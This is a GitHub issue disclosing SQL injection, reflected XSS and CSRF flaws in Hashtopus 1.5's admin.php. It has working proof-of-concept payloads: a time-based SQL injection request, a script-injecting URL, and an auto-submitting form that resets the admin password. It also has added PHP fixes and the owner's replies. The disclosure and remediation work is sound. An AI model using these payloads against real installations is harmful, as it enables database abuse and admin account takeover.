Hashtopus 1.5 Multiple Vulnerabilities #63

Open
ghost opened this issue Jul 26, 2017 · 2 comments

Comments

Projects
None yet
1 participant
@ghost
Copy link

commented Jul 26, 2017

SQL Injection (authenticated)
A SQL Injection is present in admin.php on line 1425:

     $format=$_POST["format"];
[...]
          $vysledek=mysqli_query_wrapper($dblink,"INSERT INTO hashlists (name,format,hashtype) VALUES ('$name',$format,$hashtype)");

Proof of concept:

POST /hashtopus/admin.php?a=newhashlistp HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=<valid_session_id>
Connection: close

name=ASD&format=0 or SLEEP(10)


Reflective XSS (unauthenticated)
An unauthenticated reflective cross-site scripting vulnerability is present on line 2826 in admin.php:

[...]
name=\"return\" value=\"".$_SERVER['QUERY_STRING']." 
[...]

Proof of concept:
/hashtopus/admin.php?"><script>alert(123);</script>

CSRF (Change admin password to login)
Cross-site request forgery protection is not available on sensitive forms.

<script>history.pushState('', '', '/')</script>
<form action="http://localhost/hashtopus/admin.php?a=config" method="POST">
  <input type="hidden" name="password" value="0wn3d" />
  <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
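Added example (not code from the issue or from Hashtopus): the hardened counterparts of the three patterns reported above, written as the fixes a maintainer would apply in admin.php. It assumes $dblink is a mysqli connection object, that session_start() has already run, and that the handler wiring in the trailing comment is hypothetical.

```php
<?php
// Added example, not Hashtopus code. Assumes $dblink is a mysqli object
// and that session_start() has been called before these run.

// 1. SQL injection: the original interpolates $_POST["format"] unquoted into
//    the INSERT string. Bind every value as a typed parameter instead.
function insert_hashlist(mysqli $dblink, string $name, int $format, int $hashtype): bool {
    $stmt = $dblink->prepare(
        "INSERT INTO hashlists (name, format, hashtype) VALUES (?, ?, ?)"
    );
    if ($stmt === false) {
        return false;
    }
    // "sii": one string and two integers; values never reach the SQL parser as code.
    $stmt->bind_param("sii", $name, $format, $hashtype);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// 2. Reflected XSS: the original writes $_SERVER['QUERY_STRING'] raw into an
//    attribute value. Escape for the HTML attribute context before output.
function return_field(string $query_string): string {
    $safe = htmlspecialchars($query_string, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="return" value="' . $safe . '">';
}

// 3. CSRF: issue one random token per session, embed it in every sensitive
//    form, and reject POSTs whose token does not match. A page on another
//    origin cannot read the token, so the forged form above would be refused.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(array $post): bool {
    return isset($post['csrf_token'], $_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token']);
}

// Hypothetical wiring inside the a=newhashlistp / a=config handlers:
// if (!csrf_check($_POST)) { http_response_code(403); exit; }
// insert_hashlist($dblink, $_POST['name'], (int) $_POST['format'], (int) $_POST['hashtype']);
// echo return_field($_SERVER['QUERY_STRING']);
```

The token must also be emitted as a hidden csrf_token field in each form that posts to these handlers, otherwise csrf_check() rejects legitimate submissions as well.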
@curlyboi (Owner) commented Dec 28, 2017

Hi. I didn't really bother with admin.php as long as the user is authenticated...

@curlyboi (Owner) commented Dec 28, 2017

But with the rest you are right :)
